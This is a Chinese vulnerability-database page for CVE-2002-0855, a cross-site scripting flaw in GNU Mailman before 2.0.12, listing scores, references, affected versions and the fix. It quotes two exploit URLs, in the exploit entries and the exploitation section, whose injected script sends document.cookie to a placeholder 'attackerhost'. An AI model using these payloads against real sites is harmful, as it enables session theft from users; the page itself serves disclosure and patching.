CVE-2002-0855
CVSS7.5
发布时间 :2002-09-05 00:00:00
修订时间 :2008-09-05 16:29:07
NMCOES    

[原文]Cross-site scripting vulnerability in Mailman before 2.0.12 allows remote attackers to execute script as other users via a subscriber's list subscription options in the (1) adminpw or (2) info parameters to the ml-name feature.


[CNNVD]GNU Mailman订阅跨站脚本漏洞(CNNVD-200209-011)

        Mailman 2.0.12之前的版本存在跨站脚本漏洞。远程攻击者作为其他用户借助ml-name功能中(1)adminpw或者(2)info参数用户的订阅选项单执行脚本。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0855
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0855
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-011
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5298
(VENDOR_ADVISORY)  BID  5298
http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html
(VENDOR_ADVISORY)  CONFIRM  http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html
http://www.redhat.com/support/errata/RHSA-2002-181.html
(UNKNOWN)  REDHAT  RHSA-2002:181
http://www.redhat.com/support/errata/RHSA-2002-178.html
(UNKNOWN)  REDHAT  RHSA-2002:178
http://www.redhat.com/support/errata/RHSA-2002-177.html
(UNKNOWN)  REDHAT  RHSA-2002:177
http://www.redhat.com/support/errata/RHSA-2002-176.html
(UNKNOWN)  REDHAT  RHSA-2002:176
http://www.iss.net/security_center/static/9985.php
(VENDOR_ADVISORY)  XF  mailman-subscription-option-xss(9985)
http://www.debian.org/security/2002/dsa-147
(UNKNOWN)  DEBIAN  DSA-147
http://archives.neohapsis.com/archives/bugtraq/2002-07/0268.html
(UNKNOWN)  BUGTRAQ  20020724 cross-site scripting bug of Mailman
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000522
(UNKNOWN)  CONECTIVA  CLA-2002:522

- 漏洞信息

GNU Mailman订阅跨站脚本漏洞
高危 跨站脚本
2002-09-05 00:00:00 2005-10-20 00:00:00
远程  
        Mailman 2.0.12之前的版本存在跨站脚本漏洞。远程攻击者作为其他用户借助ml-name功能中(1)adminpw或者(2)info参数用户的订阅选项单执行脚本。

- 公告与补丁

        This issue has been address in Mailman version 2.0.12.
        GNU Mailman 2.0
        
        GNU Mailman 2.0.1
        
        GNU Mailman 2.0.10
        
        GNU Mailman 2.0.11
        
        GNU Mailman 2.0.2
        
        GNU Mailman 2.0.3
        
        GNU Mailman 2.0.4
        
        GNU Mailman 2.0.5
        
        GNU Mailman 2.0.6
        
        GNU Mailman 2.0.7
        
        GNU Mailman 2.0.8
        
        GNU Mailman 2.0.9
        

- 漏洞信息 (21641)

GNU Mailman 2.0.x Subscribe Cross-Site Scripting Vulnerability (EDBID:21641)
cgi remote
2002-07-24 Verified
0 office
N/A [点击下载]
source: http://www.securityfocus.com/bid/5298/info

GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.

An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.

http://target/mailman/subscribe/ml-name?info=<script>document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;</script>		

- 漏洞信息 (21642)

GNU Mailman 2.0.x Admin Login Variant Cross-Site Scripting Vulnerability (EDBID:21642)
cgi remote
2002-07-24 Verified
0 office
N/A [点击下载]
source: http://www.securityfocus.com/bid/5299/info

GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code. 

A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software.

http://target/mailman_directory/admin/ml-name?adminpw="/onClick="window.open('http://attackerhost/attackerscript.cgi?'+document.cookie);		

- 漏洞信息

9239
Mailman /subscribe/ml-name Multiple Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-07-11 Unknow
2002-07-24 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

GNU Mailman Subscribe Cross-Site Scripting Vulnerability
Input Validation Error 5298
Yes No
2002-07-24 12:00:00 2009-07-11 02:56:00
Discovery of this issue is credited to office <office@office.ac>.

- 受影响的程序版本

GNU Mailman 2.0.11
+ Debian Linux 3.0
GNU Mailman 2.0.10
GNU Mailman 2.0.9
GNU Mailman 2.0.8
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
- RedHat PowerTools 7.1
- RedHat PowerTools 7.0
GNU Mailman 2.0.7
GNU Mailman 2.0.6
GNU Mailman 2.0.5
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- Slackware Linux 8.0
- Slackware Linux 7.1
- Slackware Linux 7.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
GNU Mailman 2.0.4
GNU Mailman 2.0.3
GNU Mailman 2.0.2
GNU Mailman 2.0.1
GNU Mailman 2.0
GNU Mailman 2.0.12

- 不受影响的程序版本

GNU Mailman 2.0.12

- 漏洞讨论

GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.

An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.

- 漏洞利用

The following example was provided:

http://target/mailman/subscribe/ml-name?info=&lt;script&gt;document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;&lt;/script&gt;

- 解决方案

This issue has been address in Mailman version 2.0.12.


GNU Mailman 2.0

GNU Mailman 2.0.1

GNU Mailman 2.0.10

GNU Mailman 2.0.11

GNU Mailman 2.0.2

GNU Mailman 2.0.3

GNU Mailman 2.0.4

GNU Mailman 2.0.5

GNU Mailman 2.0.6

GNU Mailman 2.0.7

GNU Mailman 2.0.8

GNU Mailman 2.0.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站